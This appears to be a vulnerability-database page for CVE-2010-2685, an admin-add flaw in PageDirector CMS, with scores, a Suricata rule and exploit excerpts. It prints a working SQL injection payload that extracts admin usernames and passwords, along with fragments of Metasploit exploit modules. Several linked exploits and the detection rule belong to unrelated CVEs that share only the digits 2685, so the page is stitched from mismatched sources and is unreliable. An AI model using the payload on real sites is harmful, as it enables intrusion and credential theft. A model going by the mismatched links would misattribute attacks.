CVE-2010-2685
published 2010-07-12CVE-2010-2685: siteadmin/adduser.php in Customer Paradigm PageDirector CMS does not properly restrict access, which allows remote attackers to bypass intended restrictions…
PriorityP352high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.40%
81.9th percentile
siteadmin/adduser.php in Customer Paradigm PageDirector CMS does not properly restrict access, which allows remote attackers to bypass intended restrictions and add administrative users via a direct request.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
ET WEB_SPECIFIC_APPS Possible HP Power Manager Management Web Server Login Remote Buffer Overflow Attempt
suricata·2010-07-30
CVE-2009-2685 ET WEB_SPECIFIC_APPS Possible HP Power Manager Management Web Server Login Remote Buffer Overflow Attempt
ET WEB_SPECIFIC_APPS Possible HP Power Manager Management Web Server Login Remote Buffer Overflow Attempt
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Possible HP Power Manager Management Web Server Login Remote Buffer Overflow Attempt"; flow:established,to_server; http.method; content:"POST"; nocase; http.uri; content:"/goform/formLogin"; nocase; http.request_body; content:"Login="; nocase; content:!"|0A|"; within:300; isdataat:300,relative; pcre:"/Login=[^\r\n]{300}/i"; reference:url,www.securityfocus.com/bid/36933; reference:cve,2009-2685; classtype:web-application-attack; sid:2010699; rev:8; metadata:created_at 2010_07_30, cve CVE_2009_2685, confidence Low, signature_severity Major, updated_at 2020_09_04;)
Exploit-DB
Hewlett-Packard (HP) Power Manager Administration - Remote Buffer Overflow (Metasploit)
exploitdb·2010-11-24
CVE-2009-2685 Hewlett-Packard (HP) Power Manager Administration - Remote Buffer Overflow (Metasploit)
Hewlett-Packard (HP) Power Manager Administration - Remote Buffer Overflow (Metasploit)
---
##
# $Id: hp_power_manager_login.rb 11127 2010-11-24 19:35:38Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Hewlett-Packard Power Manager Administration Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Hewlett-Packard Power Manager 4.2.
Sending a specially crafted POST request with an overly long Login string, an
attacker may be able to execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_
Exploit-DB
BASE - 'base_qry_common' Remote File Inclusion (Metasploit)
exploitdb·2010-11-24
CVE-2006-2685 BASE - 'base_qry_common' Remote File Inclusion (Metasploit)
BASE - 'base_qry_common' Remote File Inclusion (Metasploit)
---
##
# $Id: base_qry_common.rb 11127 2010-11-24 19:35:38Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'BASE base_qry_common Remote File Include',
'Description' => %q{
This module exploits a remote file inclusion vulnerability in
the base_qry_common.php file in BASE 1.2.4 and earlier.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 11127 $',
'References' =>
[
[ 'CVE', '2006-2685' ],
[ 'OSVDB', '49366'],
[ 'BID', '18298' ],
],
'Privileged' =>
Exploit-DB
PageDirector CMS - Multiple Vulnerabilities
exploitdb·2010-06-28
CVE-2010-2685 PageDirector CMS - Multiple Vulnerabilities
PageDirector CMS - Multiple Vulnerabilities
---
###################################################################################
# Exploit Title : PageDirector CMS Multiple Vulnerabilities
# Date : 20 - 6 - 2010
# Author : Tr0y-x
# Vendor : www.customerparadigm.com
# Version : All Versions
# Tested on : Linux
# Home : WwW.SeC-WaR.CoM
# Price : 675.00 $ << loooooolz
###################################################################################
-== SQL Injection Vulenrability ==-
PageDirector Script Contains A SQL Injection Vulenrability In (Index.php)
http://www.[site].com/[path]/index.php?id=[SQL]
[SQL] = UniOn+AlL+SelEct+group_concat(username,0x3e,password)+from+admin--
###################################################################################
-== Add Admin Vulenrab
Exploit-DB
CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit)
exploitdb·2007-09-03
CVE-2004-2685 CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit)
CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit)
---
##
# $Id: ccproxy_telnet_ping.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'CCProxy %q{
This module exploits the YoungZSoft CCProxy [ 'Patrick Webster ' ],
'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9179 $',
'References' =>
[
[ 'CVE', '2004-2416' ],
[ 'OSVDB', '11593' ],
[ 'BID', '11666 ' ],
[ 'URL', 'http://milw0rm.com/exploits/621' ],
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Pa
No writeups or analysis indexed.
http://packetstormsecurity.org/1006-exploits/pagedirector-sqladdadmin.txthttp://secunia.com/advisories/40367http://www.exploit-db.com/exploits/14089http://www.osvdb.org/65831http://www.vupen.com/english/advisories/2010/1633http://packetstormsecurity.org/1006-exploits/pagedirector-sqladdadmin.txthttp://secunia.com/advisories/40367http://www.exploit-db.com/exploits/14089http://www.osvdb.org/65831http://www.vupen.com/english/advisories/2010/1633
2010-07-12
Published